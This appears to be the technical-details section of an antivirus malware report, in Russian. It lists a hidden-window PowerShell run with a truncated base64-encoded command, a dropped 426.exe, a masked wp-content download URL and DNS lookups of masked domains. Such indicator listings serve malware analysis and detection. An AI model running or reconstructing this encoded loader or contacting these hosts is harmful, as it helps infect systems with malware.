Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAARQBkAHIAdQBnAHkAZgBpAGkAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AWQBjAHgAdABuAHQAdQBpAGwAbAB0AHUAaAAgACMAPgAgACQAUgBlAHAAcgByAG0AdwBrAGcAcQB5AGEAcwA9A...
- %HOMEPATH%\426.exe
- %HOMEPATH%\426.exe
- http://ne#.#omp-air.lt/wp-content/kdTiQgM/
- DNS ASK ne#.#omp-air.lt
- DNS ASK ex###les.work
- DNS ASK me##lsur.cl
- DNS ASK sw#######sdev.000webhostapp.com
- DNS ASK al#########us-stare.000webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAARQBkAHIAdQBnAHkAZgBpAGkAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AWQBjAHgAdABuAHQAdQBpAGwAbAB0AHUAaAAgACMAPgAgACQAUgBlAHAAcgByAG0AdwBrAGcAcQB5AGEAcwA9A...' (со скрытым окном)